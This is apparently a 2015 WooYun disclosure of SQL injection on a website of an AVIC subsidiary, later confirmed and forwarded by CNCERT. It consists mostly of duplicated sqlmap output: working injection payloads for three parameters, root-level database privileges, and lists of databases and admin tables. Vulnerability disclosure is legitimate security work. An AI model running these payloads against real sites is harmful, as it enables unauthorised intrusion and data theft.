漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-090863
漏洞标题:中国航空工业集团某站SQL注入
相关厂商:中国航空工业集团
漏洞作者: 路人甲
提交时间:2015-01-12 14:04
修复时间:2015-02-26 14:06
公开时间:2015-02-26 14:06
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-26: 细节向公众公开
简要描述:
中国航空工业集团某站SQL注入
详细说明:
http://www.aircraft_co.avic.com/listconent.php?cat_id=57&pid=13
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429&pid=7 AND 7730=7730&cat_id=10
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429&pid=7 AND (SELECT 1579 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (1579=1579) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat_id=10
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=429&pid=7 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x776b784771684b464a73,0x716a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cat_id=10
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429&pid=7 AND SLEEP(5)&cat_id=10
Parameter: cat_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429&pid=7&cat_id=10 AND 3163=3163
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429&pid=7&cat_id=10 AND (SELECT 6968 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=429&pid=7&cat_id=-9537 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x67596f616d654d6a6955,0x716a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429&pid=7&cat_id=10 AND SLEEP(5)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429 AND 3896=3896&pid=7&cat_id=10
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429 AND (SELECT 5103 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (5103=5103) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pid=7&cat_id=10
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: id=-9303 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767071,0x56705759696e5a475372,0x716a6a6a71),NULL,NULL,NULL,NULL#&pid=7&cat_id=10
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429 AND SLEEP(5)&pid=7&cat_id=10
---
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
database management system users privileges:
[*] 'root'@'localhost' (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
available databases [4]:
[*] information_schema
[*] kangjie
[*] mysql
[*] test
选择数据库kangjie
Database: kangjie
[26 tables]
+---------------------+
| cool_admin |
| cool_class |
| cool_config |
| cool_content |
| cool_crud_tree |
| cool_flashinfo |
| cool_friendlink |
| cool_guestbook |
| cool_jilu |
| cool_kpclass |
| cool_members |
| cool_notice |
| cool_product |
| cool_role |
| cool_role_ctud_tree |
| cool_session |
| cool_style |
| cool_style_time |
| cool_user_info |
| cool_vister |
| cool_vote |
| cool_vote_election |
| cool_vote_user |
| cool_webclass |
| cool_zixun |
| ip |
+---------------------+
漏洞证明:
http://www.aircraft_co.avic.com/listconent.php?cat_id=57&pid=13
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429&pid=7 AND 7730=7730&cat_id=10
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429&pid=7 AND (SELECT 1579 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (1579=1579) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat_id=10
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=429&pid=7 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x776b784771684b464a73,0x716a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cat_id=10
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429&pid=7 AND SLEEP(5)&cat_id=10
Parameter: cat_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429&pid=7&cat_id=10 AND 3163=3163
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429&pid=7&cat_id=10 AND (SELECT 6968 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (6968=6968) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: id=429&pid=7&cat_id=-9537 UNION ALL SELECT NULL,CONCAT(0x7171767071,0x67596f616d654d6a6955,0x716a6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429&pid=7&cat_id=10 AND SLEEP(5)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=429 AND 3896=3896&pid=7&cat_id=10
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=429 AND (SELECT 5103 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (CASE WHEN (5103=5103) THEN 1 ELSE 0 END)),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pid=7&cat_id=10
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: id=-9303 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767071,0x56705759696e5a475372,0x716a6a6a71),NULL,NULL,NULL,NULL#&pid=7&cat_id=10
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=429 AND SLEEP(5)&pid=7&cat_id=10
---
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
database management system users privileges:
[*] 'root'@'localhost' (administrator) [25]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
available databases [4]:
[*] information_schema
[*] kangjie
[*] mysql
[*] test
选择数据库kangjie
Database: kangjie
[26 tables]
+---------------------+
| cool_admin |
| cool_class |
| cool_config |
| cool_content |
| cool_crud_tree |
| cool_flashinfo |
| cool_friendlink |
| cool_guestbook |
| cool_jilu |
| cool_kpclass |
| cool_members |
| cool_notice |
| cool_product |
| cool_role |
| cool_role_ctud_tree |
| cool_session |
| cool_style |
| cool_style_time |
| cool_user_info |
| cool_vister |
| cool_vote |
| cool_vote_election |
| cool_vote_user |
| cool_webclass |
| cool_zixun |
| ip |
+---------------------+
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2015-01-16 11:48
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向航天局通报。
最新状态:
暂无